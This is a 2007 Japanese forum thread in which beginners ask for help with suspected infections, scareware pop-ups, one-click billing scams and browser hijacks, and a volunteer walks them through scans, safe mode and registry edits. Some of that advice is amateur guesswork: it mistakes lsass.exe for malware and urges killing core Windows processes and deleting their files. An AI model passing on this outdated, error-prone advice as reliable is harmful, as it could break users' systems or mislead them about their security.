ケータイから失礼します。

本日パソコンが届き無事接続出来たので、ウイルス対策もしないまままずはメールアドレスを変更しようとしたら、途中で
「メッセンジャサービス」というものが表示されました。

FROMからTOへのメッセージと書いてあり、その下には

STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION.
Windows has found55 Critical System Errors.
            と続きます。
そして1〜4までの項目に分かれて英文が書いてあり、最後に

FAILURE TO ACT NOW MAY LEAD TO SYSTEM FAILURE!             で閉めてあります。

なんだかわからず一度切断してもう一度最初からやろうとしたら、今度は次のページに進むのに5分程掛かってしまうようになり、それでもなんとか進めるとやはり先程のメッセンジャサービスというのが表示され、アプリケーションエラーというものまで出てきてしまいました。

NTTに電話して聞いてみたところ、ウイルスの可能性があると言われましたが、どうしたらいいのかまったくわかりません。

パソコン持つのは初めてなのでこれ以上自分で勝手にいじるのは怖いです。

どうすれば治るのか、どうすれば感染してるかどうかわかるのか教えてください。
お願いしますm(__)m
422まちがって名前消しちゃいました。:2007/09/03(月) 20:09:49 ID:L/zobb65
パソコンのデータが初期化されてた。だが自分がダウンロードしたアプリ(?)はちゃんと存在してる。一体どうなってるの?教えてエロい人?
423まちがって名前消しちゃいました。:2007/09/03(月) 23:51:19 ID:pKkq4dkM
最近ネット中に

microsoft visual c++ runtime library

runtime error!

program:c\program files\internet explorer\iexplore.exe

r6025
-pure virtual function call

ok ←クリックできるようになってる


と出るんですが、これって何でしょうか
424418:2007/09/04(火) 01:11:36 ID:???
>>419 レスありがとうございました。

明日、業者に連絡取ります。
425まちがって名前消しちゃいました。:2007/09/05(水) 12:27:06 ID:rRK49xHc
>>421
それは無視して良いもの。いわゆるスパムのたぐい。
パソコンつけても良いからここ読みなされ↓
http://www.higaitaisaku.com/messengerspam.html
426まちがって名前消しちゃいました。:2007/09/05(水) 12:57:11 ID:bkyE68m9
ネットに久し振りにつないだらシステムドクターっのがでてきて
システムエラーを発見しました直さないと大変なことになります みたいなふうになったんですが… ちなみにシステムドクターは登録料がかかるそうです… 無視したら駄目かな?
427親切な馬鹿 ◆ZRdbzBqg5A :2007/09/05(水) 13:18:46 ID:rRK49xHc
>>426
無視でOK。念のためウィルスチェックがよろし。
http://ratan.dyndns.info/avast4/systemdoctor2006.html
428まちがって名前消しちゃいました。:2007/09/05(水) 22:51:29 ID:Abg/x/iN
パソコンが、ログイン後の画面から操作できなくなり困っています。
「スタート」を押しても一瞬で消えてしまい、クリックする事もできません。

デスクトップのショートカットは使えるようなので色々開いてみましたが
「ファイル」や「お気に入り」は開けません。
昨日は普通に使えて、問題なく終了したのですが…

どんな原因がありますか?
どうか対策を教えてください。
429428:2007/09/05(水) 23:30:27 ID:Abg/x/iN
再起動したらみょみょみょみょみょっと音がします。
ウイルスかと思ったけど部品が変なのかな…
泣きそうになってきたので明日サポートセンターに電話して、修理してもらう事にします。
それでは。
430まちがって名前消しちゃいました。:2007/09/06(木) 00:51:27 ID:DM6U9hcx
原田ウィルスOOと言うを開いてしまった。
取りあえず電源プチ

再起動、CドライブにHOHと変なフォルダ発見 削除

色々調べてKINGSOFTのウィルスバスターインストール ファイルスキャン

スキャン中にProgram Filesの中に原田ウィルスOOの画像を手動で発見 削除

いまだスキャン中 結構テンパリ気味

どうすればいいんだろ
とりあえずシステム復元でもしてみるかな・・
431430:2007/09/06(木) 01:22:32 ID:DM6U9hcx
Documents and Settingsの自分の名前のファイルのCookies
に原田ウィルスの画像があった・・・・
システム復元したのにな
Cookiesはウインドーズの機能に大切な・・・で消せないし
どうすればいいんですか〜神様
432まちがって名前消しちゃいました。:2007/09/06(木) 01:30:57 ID:???
知り合いからメッセで来たファイル解凍して実行したら原田ウイルス00でしたよっと
フォルダのアイコンに偽装されてて気が付かなかった
あとVistaのせいだわ・・・
とりあえずどうしようか俺
433432:2007/09/06(木) 04:15:45 ID:???
今までの感染状況確認してみたところC,Dドライブ以下には何もしてない気がする
更新日時を見た限りではウイルス感染後に落としたセキュリティソフト以外の更新がなかった
感染した部分はユーザー別のお気に入りの一部のBmP化とデスクトップにあるフォルダと
IE、ごみ箱等のショートカット以外のBmP化が今の所わかる症状
BmP化したのを戻せる事ができたら感染前の状況に戻ると考えている俺は甘いかな?
山田系な動作しても流出して困るようなデータがないもんで
434まちがって名前消しちゃいました。:2007/09/06(木) 05:35:46 ID:RPK3cJ9+
この間ネットで画像のリンク開いたらおヌード写真が出て
いきなりOUTLOOKセットアップウィザードが開いた。
キャンセルしたら固まったんでCtrl+Alt+Delで写真閉じたら
問題なく使えるようになったが・・・
なんか気持ち悪いのでこれが何だったのか分かる人教えて
435まちがって名前消しちゃいました。:2007/09/06(木) 09:23:16 ID:???
>>434

原田ウィルスMK-U
オワタorz
436まちがって名前消しちゃいました。:2007/09/06(木) 10:25:37 ID:0Fept8aM
下のURLを踏んでしまいました

ttp://news-club.jp/register1.php?top=view&blog=a

そしたら黒い画面?で何か文字がズラズラと出てきたので慌てて閉じました。
レジストリって書いてあるし、こわいよう・・・これってウイルスですか?
437まちがって名前消しちゃいました。:2007/09/06(木) 18:54:03 ID:MEJMf4qQ
カーソルが勝手に右に左に飛んで行きます。
治りますか?
438まちがって名前消しちゃいました。:2007/09/06(木) 18:58:47 ID:???
Autoit.AE.5というトロイが検出されたんだけど、
これ未出?
それとも誤検出?
シマンテック他を検索しても出てこないし、
他のautoitの亜種と考えればいいんかな


>>436
DOS使ったただの振り込め詐欺


>>437
マウス抜いて挿しなおしてみれ
439436:2007/09/06(木) 20:34:36 ID:???
>>438
ありがとうございました
ご指摘の通り「ウイルスはダメ」でした。
とりえあえずspybotとかで調べてみます。
440まちがって名前消しちゃいました。:2007/09/06(木) 20:51:20 ID:???
>>439
autoitは別件の話だから気にしなくてもいいよ
紛らわしい書き方してすまんかった
441まちがって名前消しちゃいました。:2007/09/06(木) 23:16:48 ID:CXpX+GBw
インターネットをしてると突然変なサイトが新しいウィンドウででてきます。
なにか解決策はありますか?
442親切な馬鹿 ◆ZRdbzBqg5A :2007/09/07(金) 10:49:00 ID:W1Ur0h5u
443まちがって名前消しちゃいました。:2007/09/07(金) 13:45:47 ID:MME+Db5F
パソコンを操作していると、突然マウスによる操作ができなくなったり
(ちなみにマウスは「PC → キーボード → マウス」の順にUSBで接続されており
マウスによる操作ができなくなったときでもキーボードによる操作は可能)
またPCに直につないでいるUSBゲームコントローラのボタンを入力しても反応がなかったりします
長期間使用によるUSBの配線の劣化や接続不良が原因と考えておりウイルスの可能性は低いと思っているのですが
万が一ということもありますので質問させていただきました
このような症状に心当たりはありませんでしょうか?
444まちがって名前消しちゃいました。:2007/09/07(金) 13:47:31 ID:???
備考
マウスもコントローラーも一回はずしてまた繋ぎなおしてカチャカチャやると
まともに操作できるようになります
445まちがって名前消しちゃいました。:2007/09/07(金) 19:49:00 ID:rd6d175M
システムドクターってのがパソコン開く度にでてくる…削除してもしばらくすると復活するし…
あとネットしてたらいきなり洋楽?みたいなのが流れ出したネット閉じても流れてる
これってなにかな?
446親切な馬鹿 ◆ZRdbzBqg5A :2007/09/07(金) 19:55:42 ID:W1Ur0h5u
447まちがって名前消しちゃいました。:2007/09/07(金) 20:06:20 ID:rd6d175M
これの症状だったんでスーパーアンチウイルスダウンロードしてます 説明どうりに使えば解消できるかな?
448まちがって名前消しちゃいました。:2007/09/07(金) 20:48:38 ID:rd6d175M
解決しました>446さん
ありがとうございました 画面切替もスムーズになりました。ウイルスのせいだったのかな〜
449まちがって名前消しちゃいました。:2007/09/07(金) 22:08:59 ID:rd6d175M
ちなみに駆除した?ウイルスのなかにトロイアンなんたらがあったんですがこれがトロイなんですか?友達にきいたらトロイはやばいっていわれたんで
ちゃんと消せたんかな…
450まちがって名前消しちゃいました。:2007/09/07(金) 22:29:24 ID:G3pr60YF
キーボード入力が急に出来なくなってしまったんですけどウィルスですかね?

それともどこかロックを押してしまったのでしょうか?

わかる方よろしくお願いします。
451まちがって名前消しちゃいました。:2007/09/08(土) 20:09:45 ID:fFtSzwaS
普通のサイトを見ていて文字を入力しようとしたらいきなり画面が
最初の立ち上げの時の画面になってシャットダウンされました。
そのあと電源ボタンを押しても画面が真っ暗で何も映りません。
誰か分かる方対処の仕方を教えていただけませんか?
452まちがって名前消しちゃいました。:2007/09/08(土) 20:31:20 ID:AewVoJiz
開いたブラウザを閉じたら、デスクトップの背景が自分の設定したものとは違うものになってたんですが、これって何ですか?
ウィルスに感染してるんですか?

わかる方、教えてください。
453まちがって名前消しちゃいました。:2007/09/09(日) 23:38:00 ID:???
>>445

オレとまったく同じ症状・・
なおった?
454まちがって名前消しちゃいました。:2007/09/09(日) 23:57:01 ID:???
でオレもアンチでスキャンして削除
再起動してもう一度スキャンしたら

またadware.tracking cookieが出てきた・・
455453-455:2007/09/10(月) 00:58:45 ID:???
6回繰り返したらやっと全部破壊したみたい、お騒がせ失礼
456453-455:2007/09/10(月) 02:54:03 ID:???
って全然消えてなかった・・
457まちがって名前消しちゃいました。:2007/09/10(月) 14:35:41 ID:???
ttp://www.maskatt.com/index812.php/?na=812
上の動画を再生しようとしたら、新しいウィンドウが開いて登録完了となってしまいました。
よく読んだら有料で90000円とられると書いているのですが、どうすれば良いのでしょうか、教えてください。
458親切な馬鹿 ◆ZRdbzBqg5A :2007/09/10(月) 15:37:42 ID:HS5LgpQ1
>>457
ワンクリック詐欺だろ。無視でOK。
情報取られたように見せかけてるのもただのGIFアニメと思われ。
そもそも登録の前に内容が確認できないんだから契約が成立しない。
459親切な馬鹿 ◆ZRdbzBqg5A :2007/09/10(月) 16:38:12 ID:HS5LgpQ1
>>457
http://ja.wikipedia.org/wiki/%E3%83%AF%E3%83%B3%E3%82%AF%E3%83%AA%E3%83%83%E3%82%AF%E8%A9%90%E6%AC%BA
心配だったら↑見ておちつけ。
おれも落ち着いたw。
460まちがって名前消しちゃいました。:2007/09/10(月) 19:43:58 ID:???
>>458
>>459
ありがとうございました。
登録完了と表示されたときに一瞬だけ、ファイルを保存するときのウィンドウが
開いてすぐに消えてしまったので情報を取られたかウィルスを入れられたかと
思って毎日不安でしょうがありませんでした。
自分も落ち着きました。
本当にありがとうございました。
461まちがって名前消しちゃいました。:2007/09/10(月) 20:46:00 ID:???
ウイルスかどうか分からないんですけど、
youtubeなどで検索する時に最初必ず検索しようとする文字が消えるんです。
一回違うところをクリックしてもう一度検索すると普通にできます。
後、amazonで商品のレビューを見てたら文字が上下に揺れたりもします。
これ、何かのウイルスですか?わかりにくくてすいません。
462親切な馬鹿 ◆ZRdbzBqg5A :2007/09/10(月) 21:12:42 ID:HS5LgpQ1
>>461
おいらもそれなったけど、ウィルスチェックしてもなにもひっかからなかった。
大丈夫と思われ。
YouTubeの検索欄はなんかのひょうしでフォーカスが外れるだけみたいだから、
もう一回検索欄クリックしてやればOK。
amazonの方はわかんないや。多分特定のページでしか起きないと思う。
大半は大丈夫だった。
463まちがって名前消しちゃいました。:2007/09/11(火) 00:48:29 ID:???
>>462
ウイルスじゃないんですね。安心しました。
ありがとうございます。
464まちがって名前消しちゃいました。:2007/09/12(水) 15:37:21 ID:???
ウイルスバスター更新を怠ってたらネット繋げなくなるくらい完全にいかれた
やっぱり修理呼ばなくちゃ駄目?
4654 ◆NFQtmGW3bw :2007/09/12(水) 16:46:53 ID:???
>>464
モチロン。修理呼んでくだされ。

どうも俺もなんか凄いのに感染したみたいwww
消しても復活するおwww
サボってた罰かwww
466まちがって名前消しちゃいました。:2007/09/12(水) 17:32:12 ID:???
ファイル C:\System Volume Information\_restorウイルス 「Heur.Trojan.Generic」。の亜種として検知しました!
これはなんてウィルスでしょうか?どのような危険がありますか?
467中国:2007/09/13(木) 00:03:43 ID:???
>>465
ついに、おなかまw
ソフトで検出されます??
468まちがって名前消しちゃいました。:2007/09/13(木) 17:02:14 ID:???
初心者って名乗りながらID隠れてる人って、
やっぱりproxy通して書き込みしてるの?(´・ω・`)

windows98使ってるんだけどそろそろ限界の様だ
ウィルスで起動に1時間かかるんだ(;_;)
4694 ◆NFQtmGW3bw :2007/09/13(木) 17:33:22 ID:???
>>467
検出されないおwww
こりゃもう駄目だw
俺はコイツと共存するwww
470中国:2007/09/13(木) 23:06:46 ID:???
>>469
ファイル名さらしましょw
exeファイル破壊された??
471まちがって名前消しちゃいました。:2007/09/16(日) 03:02:58 ID:X6rdgOJv
すみません助けてください。
VirusSeigyoって言うみたいなんですが
タスクバーに茶色で○の中に/が入ったマーク(駐禁の標識みたいな)
が住み着いて警告出まくりで、ノートン・マイクロソフトやセキュリティーに
関するサイトにアクセス出来ず対処法も調べられません。
コントロールパネルも消えました。
どうしたら良いのかご存知の方おられましたらご教授くださいませ。
472まちがって名前消しちゃいました。:2007/09/16(日) 11:06:06 ID:???
なんかとつぜん「禿鷹」って名前の新規フォルダ作られて、スキャンしてもウイルスは検出されなかった。
一週間ぐらいたってるけど何もない。でも怖いです
473434:2007/09/17(月) 23:43:59 ID:21+UhDF8
>>435

まぢで??!!!
474まちがって名前消しちゃいました。:2007/09/18(火) 03:15:42 ID:ZBPw/PL1
peercastで配信視聴してたら誰かの送ったウイルスに感染された
突然、長文の英語が書かれたブルースクリーンが表示され
強制的に再起動されたのですが、立ち上がりが遅かったから
シャットダウンして再起動し直した。それからPCが可笑しくなった
カタッカタッと鳴り続けて「operating system not found」と表示される
リカバリーも出来なくてどうすれば良いのか分かりません
助けて ください
475親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 17:44:20 ID:wsiSQ7Q2
>>474
ウィルスにOS破壊されたと思われ。
OSのCDをCDドライブにつっこんで、CDから起動する。
HD読みに行っちゃうようだったら起動順位を変える。
パソコン起動した最初の画面にPush XX Key To enter BIOS SETUPとかあるから
猶予時間のうちにそのキーを押す。
BIOSセットアップ画面になったらBoot Diskの項目を探して一番最初にCDドライブを持ってくる。
セットアップ画面はSave&Quitで終わらせる。操作方法は英語だけどそのまんま書いてある。

CDから起動したら修復セットアップを試みる。
単語が違ったらなんかそんな感じの選んで。
新規インストールはしちゃだめ。データが全部消える。
修復セットアップできればデータの損失は最小限ですむと思う。

476親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 17:46:09 ID:wsiSQ7Q2
>>474
今後もそのPeerCastがやりたいならリアルタイム監視してくれるウィルス対策ソフト入れなされ。
ノートンとか。
477まちがって名前消しちゃいました。:2007/09/18(火) 18:48:35 ID:y0WYbQy0
ちょっと助けてください

俺のIEにアクセスしたら
http://www.esenruzgar.net のサイトにいっちゃうんです
・・・見ない方がいいです
そのサイトの左上には何か 紫色の丸い星に雷の輪 があるんです
俺のデスクに変なものが3つくらいでてきて消せないし
ツールでホームページを変えようと思ったら
書き直せないようにしてあるんです・・・

でもMSNっていうデスクにあるものをアクセスしたら
インターネットできるんです
色んな人からはスパイウェアとか
ブラウザハイジャッカー ホームページハイジャッカーなど言われました・・・

何か危険はありますか?
これをなおす対処法などあったら教えてください
ちなみに俺のパソコンはウィンのmeです
478親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 18:51:54 ID:wsiSQ7Q2
479バッカス ◆JlYS6g5DlQ :2007/09/18(火) 19:37:51 ID:???
すいません。
このスレの存在を確認せずにスレ立ててしまったんですが…
同じコトを書かせて頂きます。

ttp://imepita.zz.tc/020070817
これ踏んでからネット回線は繋がるが、ネット開いても一切表示されず
「ページを表示できません。」のページに行ってしまうんです…
誰か助けてください。
480バッカス ◆JlYS6g5DlQ :2007/09/18(火) 20:03:42 ID:???
あ、ちなみに今は専ブラです・・・
481親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 20:05:31 ID:wsiSQ7Q2
>>479
ネットが繋がらないなら市販のウィルス対策ソフト買ってくるしかあるまい。

シマンテック セキュリティチェック
   (p)http://www.symantec.com/region/jp/securitycheck/index.html
もし繋がればだけどオンラインチェック。
482477:2007/09/18(火) 20:09:22 ID:y0WYbQy0
>>478
あ あの・・・
どうやったらいいんですか?
パソコン初心者なんで、お願いします
483親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 20:14:03 ID:wsiSQ7Q2
>>482
http://download.forest.impress.co.jp/pub/win/a/adawarese/aaw2007.exe
これクリックして保存して実行。
あとは画面の指示に従って進めばOK。
484まちがって名前消しちゃいました。:2007/09/18(火) 20:29:08 ID:???
>>481
繋がりません…orz
一応ノートン先生入ってるんですが、やっぱりそれとは別物なんでしょうか?
485482:2007/09/18(火) 20:33:48 ID:y0WYbQy0
>>483
クリックして保存しました
ダウンロードしてファイルを開いたんですが
ok を押すとエラーって出てきて、なにも起きないんですが・・・
486485:2007/09/18(火) 20:49:25 ID:y0WYbQy0
>>485
俺のはmeなんで・・・
対応してないとかじゃ、ないですよね?
487486:2007/09/18(火) 20:50:09 ID:y0WYbQy0

間違えました >>483です
488親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 21:06:30 ID:wsiSQ7Q2
>>486
http://fileforum.betanews.com/download/Spybot_Search_and_Destroy/1043809773/1
こっち試してみて。
自動でダウンロードが始まると思う。
だめだったらこっちのDownLoad Nowから落としてください。
http://fileforum.betanews.com/detail/Spybot_Search_and_Destroy/1043809773/1
489親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 21:07:31 ID:wsiSQ7Q2
490まちがって名前消しちゃいました。:2007/09/18(火) 21:13:16 ID:+lQD1mGa
マカフィーでウイルススキャンしたら
New Malware.ai(トロイの木馬)って
ログがあったんだけど、これウイルスですか?
491バッカス ◆JlYS6g5DlQ :2007/09/18(火) 21:15:55 ID:???
もしかしてJS WindowBombとかいうコレが原因ですか?
ノートン見たら「完全に削除しました」って書いてあったので安心していたんdねすが
492親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 21:19:12 ID:wsiSQ7Q2
493親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 21:32:19 ID:wsiSQ7Q2
>>484
わりぃ。返事遅くなった。
とりあえずCtrl+Alt+Deleteでタスクマネージャー起動して、
プロセスの一覧貼ってくれないかな。怪しいプロセスググってみるよ。
怪しい奴がわかったらそいつプロセス終了して、ファイル検索して削除。
OK?。
494まちがって名前消しちゃいました。:2007/09/18(火) 21:39:58 ID:???
>>493
すいません、プロセスの一覧をここに貼る方法がわからないのですが…
迷惑をおかけします
495親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 21:40:35 ID:wsiSQ7Q2
>>494
すまん。コピペできないので、手で全部打ってくだされ。
496まちがって名前消しちゃいました。:2007/09/18(火) 21:41:36 ID:???
>>495
わかりました。ちょっと待っていてください…
イメージ名だけでいいんでしょうか?
497親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 21:43:28 ID:wsiSQ7Q2
>>496
OK
498まちがって名前消しちゃいました。:2007/09/18(火) 21:57:20 ID:???
出来ました・・・こんな感じです

mysqld-nt.exe
wdfmgr.exe
ULCDRSvr.exe
svchost.exe
RichVideo.exe
ccSvcHst.exe
AluSchedulerSvc.exe
AppleMobilrDeviceService.exe
VersionCueCS2.exe
usnsvc.exe
comHost.exe
alg.exe
iPodService.exe
NMIndexingService.exe
Jane2ch,exe
explorer.exe
mixi.exe
CMAudioDm.exe
NMIndexStoreSvr.exe
spoolsv.exe
AppSvc.exe
ccSvcHst.exe
svchost.exe
msnmsgr.exe
NMBgMonitor.exe
ctfmon.exe
svchost.exe
svchost.exe
iTuneHelper.exe
svchost.exe
svchost.exe
lsass.exe
services.exe
winlogon.exe
csrss.exe
taskmgr.exe
realsched.exe
smss.exe
ccApp.exe
acrotray.exe
VersionCueCS2Tray.exe
PDVDServ.exe
RTHDCPL.exe
igfxpers.exe
hkcmd.exe
igxtray.exe
System
System Idke Process
499親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 22:12:32 ID:wsiSQ7Q2
>>498
今調べ中です。
OS教えてくれるとありがたい。
500まちがって名前消しちゃいました。:2007/09/18(火) 22:15:06 ID:???
>>499
WindowsXPHomeEditionnです。

ちなみに…WindowsBombでIEが壊されてるならIE再インストールすればいいのかもとか考えましたが…どうなんでしょう????
それだと今はVer7しかないんですよね・・・
501親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 22:32:23 ID:wsiSQ7Q2
>>500
WindowsBombだとちょっと症状が違うみたい。大量にIEのWindow出すだって。
で、おまたせ。
怪しい奴ら。
・AppSvc.exe ←こいつ消せないかも。もちっと探してみる。
・Isass.exe
ここまでは殺しちゃってOK。ファイルも検索して削除。
以下は要注意。Windowsのディレクトリにいるのが贋物で削除対象。
WindowsのSystem32フォルダの中のは本物だから残しとく必要あり
先にファイル削除しようとしてできなかったらプロセスを殺す順番で。
・Services.exe
・Winlogon.exe
・csrss.exe
・smss.exe
・acrotray.exe
502親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 22:33:19 ID:wsiSQ7Q2
>>500
もし間違ってシステムのファイル消しちゃったらCDからブートしてリカバリとか復旧が必要になると思います。
503まちがって名前消しちゃいました。:2007/09/18(火) 22:35:28 ID:???
とりあえず
・AppSvc.exe
・Isass.exe
を探って削除して、以下4つはSystem32っていうフォルダの中以外のものを削除すればいいんですね??
504親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 22:39:16 ID:wsiSQ7Q2
>>503
それでOK。
AppSvcが消せなかったらセーフモードからやってみるといいと思う。
505まちがって名前消しちゃいました。:2007/09/18(火) 22:40:04 ID:???
>>504
その前に「プロセスの終了」ですか?

検索が途中でエラーに変わるんですが・・・
506まちがって名前消しちゃいました。:2007/09/18(火) 22:41:47 ID:???
やっぱり消せませんでしたorz
そして初心者ゆえにセーフモードのやり方を教えていただけると嬉しいです
507親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 22:46:09 ID:wsiSQ7Q2
>>506
Windowsが起動するときに(たぶん)「F8で問題解決どうのこうの」ってメッセージが出るので
そこでF8を押す。
選択メニューが出てくるので「セーフモードで起動」する。
セーフモードならなんとかなると思う。
508まちがって名前消しちゃいました。:2007/09/18(火) 22:46:19 ID:???
あと、「ファイルとフォルダすべて」で検索をかけても「Isass.exe」が見つからず
「ドキュメント」で検索すると途中でエラーが出る模様です
509親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 22:50:33 ID:wsiSQ7Q2
>>508
エクスプローラーのツール→フォルダオプションから
すべてのファイルとフォルダを表示する。
に設定を変えてください。
510まちがって名前消しちゃいました。:2007/09/18(火) 22:50:43 ID:???
とりあえず今から再起動してセーフモードにしてみようと思います
511まちがって名前消しちゃいました。:2007/09/18(火) 22:53:07 ID:???
先走ってすいません。
>>510の前に>>509で実行します
512まちがって名前消しちゃいました。:2007/09/18(火) 22:58:10 ID:SYZB/LMX
>>509を実行したのですがそれでも出ませんでした
とりあえずセーフモードに移行してみようと思うのですがいかがでしょうか?
513486:2007/09/18(火) 23:12:25 ID:y0WYbQy0
>>488
すみません spybotをためしてみてスキャンしてみたら
CnsMin というのが出てきて2エントリと書かれていました
削除して、念のためセーフモードでもスキャンしましたが
何も発見されませんでした
でもスキャンしおわるとフリーズして真っ暗になって赤い線が
ビリビリっと入ってしまい、再起動してしまいました

ノーマルに戻してIEのホームページを見ましたが
やっぱりガッチリ書き直せないようにされています・・・
あと、デスクに
Cep Arkada_ と Sanal Arkada_ というモノがあって
これがゴミに捨てようとしても、捨てれないようにされてるのです
もうどうしたらいいか・・・
514親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 23:19:13 ID:wsiSQ7Q2
>>513
Meだとシステムの復元があるから試してみてはどうかな。
その上でIEを対応してる最新バージョンにしてみる。
515バッカス ◆JlYS6g5DlQ :2007/09/18(火) 23:39:28 ID:eozD8Ptm
セーフモードでAppSvc.exeを削除してきました。

ただ、Isass.exeを検索しても見つからないのに加えて
Servicesで検索をかけてもどれを削除していいかわからず、また、Services.exeで検索をかけても一つしかフォルダが出てこないという事態に陥りました
(Windouws32のものしか出てきませんでした)

ここまで世話になっておいてあつかましいのかもしれませんが、どうすればよいか教えていただけないでしょうか?
516親切な馬鹿 ◆ZRdbzBqg5A :2007/09/18(火) 23:43:58 ID:wsiSQ7Q2
>>515
そういう状態であればServices.exeは消さなくても良いです。
Isass.exeはレジストリエディタで探してください。該当のエントリがあったら削除で
場所:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
値:
<リストの値> = "<Windowsシステムフォルダ>\Isass.exe"

場所:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
値:
<リストの値> = "<Windowsシステムフォルダ>\Isass.exe"

レジストリエディタは「ファイル名を指定して実行」にregeditと入力してください。
フォルダ形式になってるのでじゅんじゅんに開いていけばわかると思います。
なかったら…どうしよう。
517バッカス ◆JlYS6g5DlQ :2007/09/18(火) 23:57:14 ID:eozD8Ptm
えーとすいません。
レジストエディタで
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
まではたどりついたのですが、それ以降がよくわかりません。。
あと
値:
<リストの値> = "<Windowsシステムフォルダ>\Isass.exe"
の意味も。

手取り足とりですいません><
518親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 00:01:14 ID:wsiSQ7Q2
>>517
したらRunのフォルダが選択された状態で(多分青反転表示)、編集の検索で
「Isass.exe」探してみてください。
同じくRunserviceのほうも探してみてください。
見つかったら、名前のところをクリックしてDelキーで消してください。
519バッカス ◆JlYS6g5DlQ :2007/09/19(水) 00:05:28 ID:???
>>518
なんかいっぱい出てきたんですが…
これ全部削除するんですか?
それとも「データ」のところに出た名前で判断???
520513:2007/09/19(水) 00:12:44 ID:UclAB88W
>>514
システム復元しようとしましたが
8月17日のしかありません、設定した覚えはないのですが
とりあえずokしてみると
spybotが反応して、レジストリを検知しました みたいな事を言われて
許可する 許可しない な事を言われてチンプンカンプンです
しかもすぐ問題が発生しました など言われて
そのままフリーズしてしまいます・・・

しかも勝手になにやら 閉じる という画面がでてきたり
何がなにやら・・・ すいません 
521まちがって名前消しちゃいました。:2007/09/19(水) 00:14:10 ID:QJznINeJ
>>519
データのところに出た名前で判断してみてください。
Windows\Isass.exe
だと思います。
522親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 00:16:19 ID:QJznINeJ
>>520
8月17日なのはシステムが自動でとっておいたものと思われ。
とりあえずセーフモードから復元してみてはどうだろ。
Spybot動かないと思うけど。
523バッカス ◆JlYS6g5DlQ :2007/09/19(水) 00:17:22 ID:???
>>521
Windows\Isass.exe
というのはありませんでしたが、Isass.exeがあったので削除しました。
まだIEは繋がらない状態ですが、時間の問題なのでしょうか?
それとも他に作業を行うべきなんでしょうか?
524親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 00:19:26 ID:QJznINeJ
>>523
最後に念のためセーフモードでウィルススキャンぐらいしか思い浮かばない。
525親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 00:43:40 ID:QJznINeJ
>>523
どうしてもダメだったら最後の手段はシステムの復元するしか。
ヘルプを検索して下され。
526まちがって名前消しちゃいました。:2007/09/19(水) 01:17:49 ID:???
>>524
ありがとうございました。スキャン終了しました。。
IEは復活しませんでしたが…orz

やはり再インストールしかないのでしょうか…
527まちがって名前消しちゃいました。:2007/09/19(水) 09:44:53 ID:???
hosts ファイルじゃないの?
528520:2007/09/19(水) 10:46:22 ID:UclAB88W
>>522
セーフモードでシステムの復元をためして
spybotは反応しませんでしたが
8月17日へのシステムの復元には数分かかりますと言われ
バーがのびていったんですが、最後まで行く途中で
画面が暗くなり、再起動してしまいました
しかも、失敗したといわれて3回・・・

それと、デスクにあるメールの形が変化していて
プロパティでみた所、リンク先の最後に exe と書いてあるのですが
これは大丈夫ですか?
あと、IEのホームページを書き換えられて書き直せないようにされた事に
よって何か影響がありますか?
一応、前はIEからアクセスして通販などヤフーオークションなど
してたんですが、ゆういつインターネットできるMSNで
今はココに書き込んでいます
MSNでヤフオクや通販をしても大丈夫なんでしょうか?
MSNで通販しようとしたら、IEではカットされてたはずが
MSNではID登録して下さい と言われました・・・
他の所もそうでした・・・
このMSNでネットしてる事によって
講座番号や、そういうのを盗まれる 見られてる
なんて事はないかとても心配で眠れません・・・ お願いします・・・
529親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 11:05:39 ID:riX0jIAo
>>526
システムの復元試して
だめだったらIEのみ再インストール
だめだったらOSの復旧インストール回復インストールかも。

IEのお気に入りはDocument and Settings\ユーザー名\Favoriteの中にあるから
そのままどっかにコピー。
再インストールしたらモトの場所にコピーでOK。
530親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 11:08:41 ID:riX0jIAo
>>528
まずはIEのみ再インストール。最新版をMSから落とす。MeだとIE6だと思われ。
MSNもインターネットのアクセスにはIE使ってると思うんだけどな。
お気に入りのバックアップは>>529参照。

それでだめならOSのCDから起動して回復インストールか復旧インストール。
SPYBOTで検出できないなら口座番号は盗まれて無いと思う。
口座番号よりクレジットカードの番号や期限のほうが重要だけどね。
531529:2007/09/19(水) 12:13:21 ID:UclAB88W
>>530
IEのみ再インストールはどうやればいいのですか?
最新版をMSNから落とす、MeだとIE6 などの
そこへたどり着く手順がわからずです・・・
532親切な馬鹿 ◆ZRdbzBqg5A :2007/09/19(水) 12:26:33 ID:riX0jIAo
>>531
返事遅れてごめんよ。ちょいと野暮用でね。
http://www.microsoft.com/japan/windows/ie/downloads/ie6sp1/default.mspx
ここの日本語版のDoenloadからどぞ。
画面の右側にある。
533531:2007/09/19(水) 13:26:12 ID:UclAB88W
>>532
セットアップしますか? と表示され、する に印をつけたまま
次へ

同意する
次へ

ここからなんですが
・標準インストール−コンポーネントの標準構成
・最小構成インストール−またはブラウザのカスタマイズ
のどちらを選ぶかわかりません・・・

ちなみに、標準インストールを選択したまま次に行くと

全てのコンポーネントの最新バージョンが
既にインストールされています
